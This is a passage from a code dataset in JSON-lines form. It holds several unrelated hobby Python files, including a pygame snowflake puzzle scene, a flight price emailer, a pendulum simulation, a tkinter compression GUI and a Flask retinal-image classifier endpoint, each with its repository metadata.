jbutton\n\n\tif self.jbutton is not None and controls.mdown:\n\t\tonclick(self.buttons[self.jbutton])\n\n\tif pygame.K_TAB in controls.kdowns:\n\t\ttoggleeasy()\n\tif settings.DEBUG:\n\t\tif pygame.K_F1 in controls.kdowns:\n\t\t\tself.done = True\n\t\tif pygame.K_F2 in controls.kdowns:\n\t\t\taddpoint(controls.mpos)\n\t\tif pygame.K_F5 in controls.kdowns:\n\t\t\tsave()\n\t\tif pygame.K_F7 in controls.kdowns:\n\t\t\trandompoints()\n\t\n\tif not self.done and self.todo and not self.held:\n\t\tcheckdone()\n\tif self.done and not self.pushed:\n\t\tself.tdone = math.approach(self.tdone, 1, dt)\n\t\tif self.tdone == 1:\n\t\t\tprogress.beat(self.stage)\n\t\t\tself.pushed = True\n\t\t\tscene.pop()\n\t\t\tscene.push(winscene, self.design, Fspot1, self.stage)\n\ndef addpoint(pos):\n\tx, y = view.FconvertB(Fspot1, pos)\n\tr = math.length((x, y))\n\tna = 12 / math.tau * math.atan2(x, y)\n\tn, a = divmod(na, 1)\n\tn = int(n)\n\tif n % 2 == 1:\n\t\ta = 1 - a\n\ta = round(a, 3)\n\tr = round(r, 3)\n\tdata = a, r, n\n\n\tif n % 2 == 1:\n\t\ta = 1 - a\n\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\tpF = S, C\n\tcovered = iscovered(pF)\n\tif covered:\n\t\tself.ydata += [data]\n\t\tself.yespoints += [pF]\n\telse:\n\t\tself.ndata += [data]\n\t\tself.nopoints += [pF]\n\tprint()\n\tprint([self.ydata, self.ndata])\n\tcheckcover()\n\t\n\ndef randompoints():\n\tyout, nout = [], []\n\tself.yespoints = []\n\tself.nopoints = []\n\tfor _ in range(16):\n\t\ta = random.uniform(0, 1)\n\t\tr = random.uniform(0, 1)\n\t\tn = 0\n\t\tif n % 2 == 1:\n\t\t\ta = 1 - a\n\t\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\t\tpos = S, C\n\t\tcovered = self.design.colorat(pos)\n\t\tif covered:\n\t\t\tself.yespoints.append((S, C))\n\t\t\tyout.append((a, r, n))\n\t\telse:\n\t\t\tself.nopoints.append((S, C))\n\t\t\tnout.append((a, r, n))\n\tprint(yout)\n\tprint(nout)\n\tcheckcover()\n\ndef isred(color):\n\tr, g, b, a = ptext._resolvecolor(color, None)\n\treturn r > 1.01 * g and r > 1.01 * b\n\ndef iscovered(pos):\n\tcovered = self.design.colorat(pos)\n\tif self.held:\n\t\theldcolor = self.held.colorat(render.tosector0(pos))\n\t\tif heldcolor:\n\t\t\tcovered = heldcolor\n\treturn not (covered is None or isred(covered))\n\ndef checkcover():\n\tself.yescovers = []\n\tself.nocovers = []\n\tfor pos in self.yespoints:\n\t\tself.yescovers.append(iscovered(pos))\n\tfor pos in 
self.nopoints:\n\t\tself.nocovers.append(iscovered(pos))\n\ndef checkdone():\n\tif self.stage == \"free\":\n\t\treturn\n\n\tif self.stage == \"stage1\":\n\t\tself.done = self.store[0][1] == 0\n\telse:\n\t\tself.done = all(self.yescovers) and not any(self.nocovers)\n\n\ndef getjstore(shape):\n\tif self.stage == \"free\":\n\t\treturn None\n\tfor jstore, store in enumerate(self.store):\n\t\tif store[0].same(shape):\n\t\t\treturn jstore\n\tprint(\"Error restoring shape.\")\n\treturn None\n\n\ndef onclick(button):\n\tif button.text == \"Quit\":\n\t\tscene.push(frostscene, depth1 = 3)\n\t\tsound.play(\"fail\")\n\tif button.text == \"Share\":\n\t\tif self.design.shapes:\n\t\t\tscene.push(uploadscene, self.design, Fspot1)\n\t\tsound.play(\"bonk\")\n\tif button.text.startswith(\"store-\"):\n\t\tjstore = int(button.text[6:])\n\t\tshape, n = self.store[jstore]\n\t\tshape = button.shape\n\t\tif n is not None and n <= 0:\n\t\t\tsound.play(\"no\")\n\t\telif self.maxshapes is not None and len(self.design.shapes) >= self.maxshapes:\n\t\t\tsound.play(\"no\")\n\t\telse:\n\t\t\tif n is not None:\n\t\t\t\tself.store[jstore][1] -= 1\n\t\t\tself.held = shape.copy()\n\t\t\tself.cursorimg = self.held.cursorimg(T(100))\n\t\t\tself.jheld = 0\n\tif button.text.startswith(\"color-\") or button.text == \"???\":\n\t\tsound.play(\"bonk\")\n\t\tif \"?\" in button.text:\n\t\t\tcolor = \"#\" + \"\".join(random.choice(\"89abcdef\") for _ in range(6))\n\t\telse:\n\t\t\tcolor = tuple(pygame.Color(button.text[6:]))\n\t\t\tcolors = [math.imix(color, (255, 255, 255, 255), a) for a in (0, 0.2, 0.4, 0.6, 0.8)]\n\t\t\tcolornow = tuple([button.shape.color for button in self.buttons if button.text == \"store-0\"][0])\n\t\t\tif colornow in colors:\n\t\t\t\tcolor = colors[(colors.index(colornow) + 1) % len(colors)]\n\t\t\telse:\n\t\t\t\tcolor = colors[0]\n\t\tfor button in self.buttons:\n\t\t\tif button.text.startswith(\"store-\"):\n\t\t\t\tshape = button.shape.copy()\n\t\t\t\tshape.color = color\n\t\t\t\tbutton.setshape(shape)\n\tif button.text.startswith(\"size-\"):\n\t\tsound.play(\"bonk\")\n\t\tksize = int(button.text[5:])\n\t\tfor button in self.buttons:\n\t\t\tif button.text.startswith(\"store-\"):\n\t\t\t\tshape = button.shape.copy()\n\t\t\t\tshape.setksize(ksize)\n\t\t\t\tbutton.setshape(shape)\n\ndef draw():\n\tif pview._fullscreen:\n\t\tpygame.mouse.set_visible(True)\n\telse:\n\t\tpygame.mouse.set_visible(not self.inFbox0 or self.held is None)\n\tbackground.draw()\n\n\tfor jbutton, button in enumerate(self.buttons):\n\t\tnote = None\n\t\tif button.text.startswith(\"store-\"):\n\t\t\tjstore = int(button.text[6:])\n\t\t\tnote = self.store[jstore][1]\n\t\t\tif note is not None:\n\t\t\t\tnote = \"%d\" % note\n\t\tif self.maxshapes is not None and len(self.design.shapes) >= self.maxshapes:\n\t\t\tnote = \"\"\n\t\tbutton.draw(lit = (jbutton == self.jbutton), note = note)\n\tself.design.drawwedge(Fspot0)\n\tself.design.draw(Fspot1)\n\trender.sector0(Fspot0)\n\tif self.inFbox0:\n\t\trender.sectors(Fspot1)\n\n\tfor text, pos in self.labels:\n\t\tptext.draw(text, center = T(pos), fontsize = T(30),\n\t\t\tcolor = \"#ffffaa\", fontname = \"ChelaOne\",\n\t\t\tshade = 1, owidth = 0.4, shadow = (1, 1))\n\n\tFspot = Fspot0 if settings.closepoints else Fspot1\t\n\ta = math.cycle(pygame.time.get_ticks() / 500)\n\toffcolor = pygame.Color(*math.imix((50, 50, 100), (100, 100, 255), a))\n\tfor (x, y), covered in zip(self.yespoints, self.yescovers):\n\t\tp = view.BconvertF(Fspot, (x, y))\n\t\tcolor = pygame.Color(\"#aaaaff\") if covered else 
offcolor\n\t\tocolor = pygame.Color(\"black\" if covered else \"white\")\n\t\tpygame.draw.circle(pview.screen, ocolor, T(p), T(8))\n\t\tpygame.draw.circle(pview.screen, color, T(p), T(6))\n\toncolor = pygame.Color(*math.imix((100, 50, 50), (255, 100, 100), a))\n\tfor (x, y), covered in zip(self.nopoints, self.nocovers):\n\t\tp = view.BconvertF(Fspot, (x, y))\n\t\tcolor = oncolor if covered else pygame.Color(\"#884444\")\n\t\tocolor = pygame.Color(\"white\" if covered else \"black\")\n\t\trect = T(pygame.Rect(0, 0, 16, 16))\n\t\trect.center = T(p)\n\t\tpygame.draw.rect(pview.screen, ocolor, rect)\n\t\trect = T(pygame.Rect(0, 0, 12, 12))\n\t\trect.center = T(p)\n\t\tpygame.draw.rect(pview.screen, color, rect)\n\tif settings.DEBUG:\n\t\tptext.draw(str(self.pointcolor), bottomright = T(1260, 710), fontsize = T(30))\n\n\tif self.yespoints:\n\t\tn = len(self.yescovers)\n\t\ta = sum(self.yescovers)\n\t\ttext = \"Remaining: %d/%d\" % (n - a, n)\n\t\tptext.draw(text, topright = T(1280, 0), fontsize = T(38), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ccccff\", shade = 0.5, shadow = (1, 1))\n\tif self.nopoints:\n\t\tn = len(self.nocovers)\n\t\ta = sum(self.nocovers)\n\t\ttext = \"Covered: %d/%d\" % (a, n)\n\t\tptext.draw(text, topright = T(1280, 38), fontsize = T(38), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ffcccc\", shade = 0.5, shadow = (1, 1))\n\tif (self.yespoints or self.nopoints) and settings.closepoints:\n\t\tptext.draw(\"EASY MODE: ON\", topleft = T(10, 500), fontsize = T(30),\n\t\t\tcolor = \"#ffffaa\", fontname = \"ChelaOne\",\n\t\t\tshade = 1, owidth = 0.4, shadow = (1, 1))\n\n\tif self.maxshapes is not None:\n\t\ttext = \"Shapes used: %d/%d\" % (len(self.design.shapes), self.maxshapes)\n\t\tptext.draw(text, topright = T(1280, 0), fontsize = T(38), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ffffff\", shade = 0.5, shadow = (1, 1))\n\n\tif self.held and self.inFbox0:\n\t\tfor j, anchor in enumerate(self.held.anchors):\n\t\t\tcolor = \"white\" if j == self.jheld else \"orange\"\n\t\t\trender.anchor(Fspot0, anchor, color)\n\t\tself.held.drawoutline0(Fspot0)\n\t\tself.held.drawoutline(Fspot1)\n\telse:\n\t\tif self.held:\n\t\t\trect = self.cursorimg.get_rect(center = T(self.mpos))\n\t\t\tpview.screen.blit(self.cursorimg, rect)\n\t\tfor i, j, anchor in self.design.anchors():\n\t\t\tcolor = \"white\" if (i, j) == self.panchor else \"orange\"\n\t\t\trender.anchor(Fspot0, anchor, color)\n\n\tif self.stage in stagedata.helptext:\n\t\ttext = stagedata.helptext[self.stage]\n\t\talpha = 0.3 if self.mpos[1] > 600 else 1\n\t\tptext.draw(text, midbottom = T(640, 700), fontsize = T(38), width = T(1000), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ffffaa\", shade = 1, shadow = (1, 1), alpha = alpha)\n\ndef save():\n\tstate = {\n\t\t\"design\": self.design.getspec(),\n\t}\n\tjson.dump(state, open(settings.savefilename, \"w\"))\n\ndef canload():\n\treturn os.path.exists(settings.savefilename)\n\ndef load():\n\tstate = json.load(open(settings.savefilename, \"r\"))\n\tself.design = flake.Design(state[\"design\"])\n\n\n","repo_name":"cosmologicon/pyjam","sub_path":"snowcrafter/src/playscene.py","file_name":"playscene.py","file_ext":"py","file_size_in_byte":14509,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"20656339237","text":"from data_manager import DataManager\nfrom flight_search import FlightSearch\nfrom notification_manager import NotificationManager\nfrom datetime import datetime, 
timedelta\n\ndata_manager = DataManager()\nflight_search = FlightSearch()\nnotification_manager = NotificationManager()\n\nsheet_data = data_manager.get_destination_data()\n\nORIGIN_CITY_IATA = \"LON\"\n\nif sheet_data[0][\"iataCode\"] == \"\":\n for city in sheet_data:\n city[\"iataCode\"] = flight_search.get_destination_code(city[\"city\"])\n data_manager.destination_data = sheet_data\n data_manager.update_destination_codes()\n\ntomorrow = datetime.now() + timedelta(days=1)\nsix_month_from_tomorrow = tomorrow + timedelta(days=(6 * 30))\n\nfor destination in sheet_data:\n flight = flight_search.check_flights(\n ORIGIN_CITY_IATA,\n destination[\"iataCode\"],\n tomorrow,\n six_month_from_tomorrow\n )\n if flight is None:\n continue\n if flight.price < destination[\"lowestPrice\"]:\n users = data_manager.get_customer_emails(destination[\"email\"])\n emails = [row[\"email\"] for row in users]\n names = [row[\"firstName\"] for row in users]\n message = (f\"Low price alert! Only ${flight.price} to fly from {flight.origin_city}-{flight.origin_airport}\"\n f\" to {flight.destination_city}-{flight.destination_airport},\"\n f\" from {flight.out_date} to {flight.return_date}.\")\n if flight.stop_overs > 0:\n message += f\"{flight.stop_overs} stopovers, via {flight.via_city}.\"\n print(message)\n notification_manager.send_emails(emails, message)\n","repo_name":"IvanTrigueiro/100-Days-of-Python-Pro-2023","sub_path":"Day-39-40-Flight-Tracker-Club/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38168067072","text":"\n# * Generators!\n# ? Generators are Iterators\n# ? Generators can be created with generator functions\n# ? Generator functions use the YIELD keyword\n# ? Generators can be created with generator expressions\n\n# * Generator Functions (compared to functions)\n# ? uses YIELD (uses return)\n# ? can YIELD multiple times (returns once)\n# ? 
When invoked, returns a generator (returns the return value)\n\n\ndef week():\n days = [\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n \"Saturday\",\n \"Sunday\"\n ]\n for day in days:\n yield day\n\n\ndef yes_or_no():\n response = 'yes'\n while True:\n yield response\n response = 'no' if response == 'yes' else 'yes'\n","repo_name":"Pat-Brennan/Udemy-Python-Bootcamp","sub_path":"iterators-generators/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23671993323","text":"\n\n\n\n# Thank-You https://medium.com/towards-artificial-intelligence/datetime-manipulations-with-python-de57aa7e3439\ndef datetime_examples():\n \"\"\"\n docstring here\n \"\"\"\n from datetime import date\n from datetime import time\n from datetime import datetime\n\n import calendar\n today = date.today();\n print(f\"The Date today is {today}\")\n print(f\"The constituent parts of the date today are : Day {today.day} | Month {today.month} | Year {today.year}\")\n print(\"Lets convert this to strings\")\n\n weekday = today.weekday()\n weekdayName = calendar.day_name[weekday]\n monthName = calendar.month_name[today.month]\n print(f\"It's a {weekdayName} in {monthName}\")\n\n now = datetime.now();\n print(f\"Ok to the millisecond its : {now}\")\n print(f\"If i were to only think interms of time : {now.time()}\")\n \n #NB the timezone is 'None' see the timezone section for how to enable it.\n timeZone = now.tzname()\n print(f\"Timezone is unset {timeZone}\")\n\n #Adding relative amounts of time / dates see timedelta.\n\n\n# https://powerfulpython.com/blog/checking-dict-keys/\ndef dictionary_manipulation() :\n return None;","repo_name":"davewd/python_cheatsheet","sub_path":"python_cheatsheet/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35668941342","text":"#Projeto 1\r\n#Pêndulo elastico\r\n\r\n\r\n\r\n\r\nfrom math import *\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\nimport numpy as np\r\n\r\ng = 9.8\r\n\r\n#Caracteristicas do pendulo\r\nprint('Informe as características do sistema')\r\nk = float(input('Constânte da mola em N/m:'))\r\nm = float(input('Massa do pendulo em kg:'))\r\nL = float(input('Comprimento natural da mola em metro:'))\r\n\r\n\r\n#posiao inicial em dadas pelo angulo e comprimento inicial\r\nprint('Informe ascoordenadas da posição inicial do pêndulo ')\r\nr = float(input('Comprimento inicial da mola: '))\r\ndif = sqrt((L-r)**2)\r\nwhile dif >= L:\r\n\tprint('Se a diferença entre o comprimento natural e inicial da mola for maior que o comprimento natural, talvez o programa não funcione')\r\n\tr = float(input('Por favor, digite outro comprimento inicial da mola: '))\r\n\tdif = sqrt((L-r)**2)\r\n\r\ntheta = radians(float(input('Angulo inicial: ')))\r\n\r\n#tempo total\r\ndelta_t = 0.0025\r\ntime = int(input('informe o tempo em segundos:'))\r\n\r\nn = time//delta_t\r\nn = int(n)\r\n\r\n#precisão\r\np = 1001\r\nwhile p > 1000 or p < 0:\r\n \r\n p = 10**int(input('Informe a precisãodo programa de 0 à 3.'\r\n 'OBS: Dependendo do tempo total e da precisão '\r\n 'o programa demora um pouco para rodar''\\n',))\r\n\r\n \r\n#definindo as listas\r\nposition_rad = []\r\nposition_theta = []\r\nposition_x = []\r\nposition_z = []\r\nlist_time = [0]\r\nlist_v = [0] # para o 
gráfico módulos de v vs t\r\nlist_v_x = [0]\r\nlist_v_z = [0]\r\nacceleration = []\r\nacceleration_x = []\r\nacceleration_z = []\r\nEnergy = []\r\n\r\n#Colocando o primeiro item das listas\r\nposition_rad.append(r)\r\nposition_theta.append(degrees(theta))\r\nposition_x.append(r*sin(theta))\r\nposition_z.append(r*cos(theta))\r\n\r\n\r\n#função para criar arquivos de saída\r\ndef bloco(nome, dado, a):\r\n dado = str(dado)\r\n arquivo = open(nome + '.txt', a)\r\n arquivo.write(dado + '\\n')\r\n arquivo.close()\r\n \r\nnames = ['time','position_x','position_z','velocity_x','velocity_z','acceleration_x','acceleration_z']\r\nfor j in range(len(names)):\r\n bloco(names[j],names[j], 'w')\r\n\r\n\r\n\r\n#contador do tempo\r\ndef time_up(t):\r\n cont_time = 0\r\n for i in range(n):\r\n cont_time = cont_time + t\r\n list_time.append(round(cont_time,5))\r\n \r\n#função de atualização em coord. polar \r\ndef runnig_values(r, theta, L):\r\n\r\n #adicionando algumas condições iniciais alis\r\n \r\n v_rad = 0 \r\n v_ang = 0\r\n \r\n acc = sqrt((- g*sin(theta)/r)**2 + (-k*(r-L)/m + g*cos(theta))**2)\r\n acceleration.append(acc) # aceleração inicial\r\n acceleration_x.append(acc*sin(theta))\r\n acceleration_z.append(acc*cos(theta))\r\n \r\n E_mec = -m*g*r*cos(theta)+ (k*(r-L)**2)/2 # energia inicial\r\n Energy.append(E_mec) # energia inicial\r\n\r\n \r\n for i in range(n):\r\n for i in range(p):#dois \"for\" para aumentar a precisão\r\n #Caso qeiram deixar o programa mais rápido, apenas diminua o valor\r\n #de p, se quiser deixar mais preciso, aumente\r\n #Atualização da posição angular\r\n acc_ang = - g*sin(theta)/r - 2*v_ang*v_rad/r\r\n v_ang = v_ang + acc_ang*delta_t/p\r\n theta = theta + v_ang*delta_t/p\r\n \r\n\r\n\r\n #atualização da posição no eixo r\r\n acc_rad = -k*(r-L)/m + g*cos(theta) + (v_ang**2)*r\r\n v_rad = v_rad + acc_rad*delta_t/p\r\n r = r + v_rad*delta_t/p\r\n\r\n \r\n \r\n \r\n \r\n #passando para cartesiano\r\n acc = sqrt((acc_ang*r)**2 + acc_rad**2)\r\n v_mod = sqrt(v_rad**2 + (r*v_ang)**2)\r\n v_x = v_ang*r*cos(theta) - v_rad*sin(theta)\r\n v_z = v_rad*cos(theta) - v_ang*r*sin(theta)\r\n x = r*sin(theta)\r\n z = r*cos(theta)\r\n acc_x = acc*sin(theta)\r\n acc_z = acc_rad*cos(theta) - acc_ang*r*sin(theta)\r\n\r\n \r\n E_mec = (m*v_mod**2)/2 - m*g*r*cos(theta) + (k*(r-L)**2)/2\r\n #A energia se conserva pois permanece aproximadamente constante\r\n #As pequenas oscilações na ordem de 10^-3\r\n #são devido ao erro da integraçã numérica\r\n \r\n #Adicionando os itens às respectivas listas\r\n position_x.append(round(x,5))\r\n position_z.append(round(z,5))\r\n list_v.append(round(v_mod,5))\r\n list_v_x.append(round(v_x,5))\r\n list_v_z.append(round(v_z,5))\r\n acceleration.append(round(acc,5))\r\n acceleration_x.append(round(acc_x,5))\r\n acceleration_z.append(round(acc_z,5))\r\n position_rad.append(round(r,5))\r\n Energy.append(round(E_mec,5))\r\n\r\n\r\n\r\nrunnig_values(r, theta, L)\r\ntime_up(delta_t)\r\n\r\n\r\n#fazendo os gráficos\r\nlogical_graf = input('Deseja abrir os gráficos? 
Digite s ou n' '\\n')\r\nif logical_graf == 's':\r\n \r\n def grafic(x,y,lab_x,lab_y):\r\n plt.plot(x,y)\r\n plt.xlabel(lab_x)\r\n plt.ylabel(lab_y)\r\n plt.show()\r\n grafic(position_x, position_z ,'posição x em m','Posição z em m' )\r\n grafic(list_time, Energy , 'tempo s','Energia mecanica' )\r\n grafic(list_time, position_rad , 'tempo s','Comprimento em m' )\r\n grafic(list_time, list_v ,\"tempo s\",'vocidade m/s' )\r\n grafic(list_time, acceleration, 'tempo s',' aceleracao m/s^2')\r\n grafic(position_x, list_v_x ,'posicao x (metro)','velocidade no eixo x m/s' )\r\n grafic(position_z, list_v_z ,'posicao z (metro)','velocidade no eixo z m/s' )\r\n\r\n#Criando arquivos de saída\r\nlogical_arq = input('Deseja criar arquivos de saída para os dados? Digite s ou n' '\\n')\r\nif logical_arq == 's':\r\n ll = [list_time, position_x,\r\n position_z,\r\n list_v_x,\r\n list_v_z,\r\n acceleration_x, acceleration_z]\r\n\r\n l_label = ['time','position_x', 'position_z',\r\n 'velocity_x', 'velocity_z', 'acceleration_x',\r\n 'acceleration_z']\r\n \r\n for j in range(len(l_label)):\r\n for i in range(len(list_time)):\r\n bloco(l_label[j], ll[j][i], 'a')\r\n \r\n\r\n#Animação do pêndulo\r\nlogical_ani = input('Deseja abrir a simulação? Digite s ou n' '\\n')\r\nif logical_ani == 's':\r\n\r\n fig, ax = plt.subplots()\r\n xdata, ydata = position_x, position_z\r\n ln, = plt.plot([], [], 'ro', animated = True)\r\n spring, = plt.plot([], [], 'b-', linewidth = 2)\r\n\r\n\r\n\r\n def init():\r\n ax.set_xlim(-2*L, 2*L)\r\n ax.set_ylim(2*r,0)\r\n return ln,\r\n\r\n def draw(n):\r\n spring.set_data([ 0.0, xdata[n] ], [ 0.0, ydata[n] ])\r\n ln.set_data(xdata[n], ydata[n])\r\n return spring,ln\r\n\r\n ani = FuncAnimation(fig, draw, n, interval= 0.001,\r\n init_func=init, blit=True)\r\n plt.show()\r\n","repo_name":"Gustavobflh/IntroPython","sub_path":"Projeto 1/Projeto_pendulo_mola_gustavo.py","file_name":"Projeto_pendulo_mola_gustavo.py","file_ext":"py","file_size_in_byte":6695,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36798442815","text":"#!/usr/bin/env python3\n\n# A Simple Application for handling yay0 files\n\nfrom tkinter import *\nimport tkinter.filedialog as filedialog\nfrom PIL import Image, ImageTk\nimport os, logging\nimport frontend, lzyf\n\nclass Application(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.appName = \"Application Utility\"\n self.infilename = ''\n self.tmpfilename = \"game_over.256x32.png\"\n self.log = logging.getLogger(self.appName)\n self.prepare()\n def prepare(self):\n self.master.title(self.appName)\n self.pack(fill=BOTH, expand=1)\n quitButton = Button(self, text=\"Decode\",\n command=self.image_decode)\n quitButton.place(x=0, y=0)\n self.textLabel = Label(self, text=\"Ready!\")\n self.textLabel.place(x=0, y=50)\n self.imgLabel = Label(self, image=None)\n self.imgLabel.place(x=0, y=100)\n\n mainMenu = Menu(self.master)\n self.master.config(menu=mainMenu)\n\n fileMenu = Menu(mainMenu)\n fileMenu.add_command(label=\"Open...\", command=self.open_file)\n fileMenu.add_command(label=\"Save PNG\", command = self.save_file)\n fileMenu.add_command(label=\"Exit\", command=self.app_exit)\n mainMenu.add_cascade(label=\"File\", menu=fileMenu)\n\n viewMenu = Menu(mainMenu)\n viewMenu.add_command(label=\"Show Image\", command=self.show_image)\n viewMenu.add_command(label=\"Show Text\", command=self.show_text)\n mainMenu.add_cascade(label=\"View\", menu=viewMenu)\n\n 
toolsMenu = Menu(mainMenu)\n toolsMenu.add_command(label=\"Compress Yay0 file...\", command=self.compress_yay0)\n toolsMenu.add_command(label=\"Compress LZYF file...\", command=self.compress_lzyf)\n mainMenu.add_cascade(label=\"Tools\", menu=toolsMenu)\n def image_decode(self):\n self.tmpfilename = ''\n ext = frontend.parseFilename(self.infilename)[-1]\n # If file extension ends in y it's pixel data only with a\n # separate palette file containing palette information.\n if 'y' == ext[-1]:\n self.tmpfilename = frontend.processMultiFileImage(self.infilename)\n else:\n self.tmpfilename = frontend.processSingleFileImage(self.infilename)\n if(self.tmpfilename == ''):\n self.textLabel['text'] = \"Image Decode Failed!\"\n else:\n self.textLabel['text'] = \"Image Decoded Successfully!\"\n def open_file(self):\n self.infilename = filedialog.askopenfilename()\n self.log.info((\"Selected: %s\" % self.infilename))\n self.textLabel['text'] = \"Opened:\"+self.infilename\n def save_file(self):\n self.outfilename = frontend.getPngFileName(self.infilename)\n os.rename(self.tmpfilename, self.outfilename)\n self.textLabel['text'] = \"Saved:\" + self.outfilename\n def app_exit(self):\n exit()\n def show_image(self):\n load = Image.open(self.tmpfilename) # TODO: Modify this !!!\n render = ImageTk.PhotoImage(load)\n # self.imgLabel = Label(self, image=render)\n self.imgLabel.configure(image=render)\n self.imgLabel.image = render\n # self.imgLabel.configure(image=render)\n # self.imgLabel.place(x=0, y=100)\n def show_text(self):\n self.textLabel['text'] = \"Image Displayed!\"\n def compress_yay0(self):\n self.textLabel['text'] = \"Not Yet Implemented!\"\n def compress_lzyf(self):\n file_types = [(\"Binary File\",\"*.bin\"),(\"All Files\",\"*\")]\n f_in = filedialog.askopenfile(master=self, mode=\"rb\",title=\"Open File\",filetypes=file_types)\n self.textLabel.configure(text=\"Compressing... 
please wait!\")\n self.update()\n if f_in:\n out = lzyf.create_lzyf(f_in.read())\n file_types = [(\"LZYF File\",\"*.lzyf\"),(\"Binary File\",\"*.bin\"),(\"All Files\",\"*\")]\n n = file_types[0][1].replace('*', os.path.splitext(f_in.name)[0], 1)\n print(\"Initial file {}\".format(n))\n f_out = filedialog.asksaveasfile(mode=\"wb\", initialfile=n, title=\"Save As...\", filetypes=file_types)\n if f_out != None:\n f_out.write(out)\n self.textLabel['text'] = \"Compressed {} to {}\".format(f_in.name, f_out.name)\n else:\n self.textLabel['text'] = \"Aborted!\"\n else:\n self.textLabel['text'] = \"Aborted!\"\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n root = Tk()\n root.geometry(\"400x400\")\n app = Application(root)\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"madhuri2k/fantastic-spoon","sub_path":"yay0/app.pyw","file_name":"app.pyw","file_ext":"pyw","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16862468209","text":"import tensorflow as tf\nfrom PIL import Image\nimport numpy as np\nfrom flask import Flask,jsonify,request\nimport werkzeug\nimport os\nimport json\n\n# from flask_cors import CORS, cross_origin\napp = Flask(__name__)\n# cors = CORS(app)\n# app.config['CORS_HEADERS'] = 'Content-Type'\n\n\n\n\nnewsize = (299,299)\nvalue_lookup = {\n 0 : 'No DR',\n 1 : 'Mild',\n 2 : 'Moderate',\n 3 : 'Severe',\n 4 : 'Proliferative DR'\n}\n\n@app.route('/webRequset',methods = ['POST'])\ndef get_FromWeb():\n imagefile = request.files['image']\n filename = werkzeug.utils.secure_filename(imagefile.filename)\n imagefile.save('uploadedimages/'+filename)\n s = os.listdir(\"./uploadedimages\")\n file_ = \"./uploadedimages/\" + s[0]\n test_single = Image.open(file_)\n test_single = test_single.resize(newsize)\n test_single = np.asarray(test_single)\n print(test_single.shape)\n \n # return jsonify({'result':value_lookup[result]})\n\n\n\n@app.route('/upload',methods = ['POST'])\ndef upload():\n if(request.method == 'POST'):\n imagefile = request.files['image']\n filename = werkzeug.utils.secure_filename(imagefile.filename)\n imagefile.save('uploadedimages/'+filename)\n s = os.listdir(\"./uploadedimages\")\n file_ = \"./uploadedimages/\" + s[0]\n test_single = Image.open(file_)\n test_single = test_single.resize(newsize)\n test_single = np.asarray(test_single)\n test_single = test_single* (1. 
/ 255)\n print(test_single.shape)\n test_single = test_single.reshape(1,299, 299, 3)\n Xmodel = tf.keras.models.load_model('./work.h5')\n pred = Xmodel.predict(test_single)\n result = np.argmax(pred)\n os.remove(file_)\n print(result)\n return jsonify({'result':value_lookup[result]})\n\nif __name__ == \"__main__\":\n app.run(port=4000,debug=True,host=\"0.0.0.0\")","repo_name":"vijayshankarrealdeal/ProjectWork","sub_path":"ProjectX/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27387768334","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, IntegerField, TextAreaField, BooleanField, SelectField, FileField\nfrom wtforms.validators import InputRequired, Optional, Email, NumberRange, URL, ValidationError, Regexp\n\nclass AddPetForm(FlaskForm):\n \"\"\"form for adding pet to the database\"\"\"\n name = StringField(\"Pet's Name\", validators=[InputRequired(message=\"Pet's Name cannot be blank\")])\n species = SelectField('Species', choices=[('cat', 'Cat'), ('dog', 'Dog'), ('porcupine', 'Porcupine')])\n photo = StringField(\"Photo URL of Pet\", validators=[Optional(),URL(require_tld=True, message=\"Should be a vaild URL\")])\n age = IntegerField(\"Age of Pet\",validators=[NumberRange(min=0, max=30, message=\"Age should be between 0 to 30\"),Optional()])\n notes = TextAreaField(\"Other Notes\", validators=[Optional()])\n available = BooleanField(\"Is Available?\")\n\nclass EditPetInfo(FlaskForm):\n \"\"\"update and edit pet's information in the database\"\"\"\n photo_url = StringField(\"Photo URL of Pet\", validators=[Optional(),Regexp(r'^(http:|https:|/)(\\w|[=+/?.-])*')])\n upload = FileField(\"Image Upload\", validators=[Optional()])\n notes = TextAreaField(\"Other Notes\", validators=[Optional()])\n available = BooleanField(\"Is Available?\")\n\n def validate_photo_upload(self,photo_url,upload):\n if photo_url and upload:\n raise ValidationError(\"Photo Upload or PhotoURL fields should be filled, not both...\")\n \n\n\n","repo_name":"nikgun1984/Adoption_Agency","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4103900365","text":"import math\nfrom time import sleep\nfrom typing import Any, Tuple\n\nfrom loguru import logger\n\nfrom .command import ActivatedModes, Command, CommandParser, TimeType, WeatherType\nfrom .evo_encoder import EvoEncoder\nfrom .evo_pixmap import RawPixmap\nfrom .packet import Packet, ResponsePacket\nfrom .pixoo import Pixoo\n\n\ndef parse_packet(data: bytes) -> Any:\n return Packet.parse(CommandParser(), 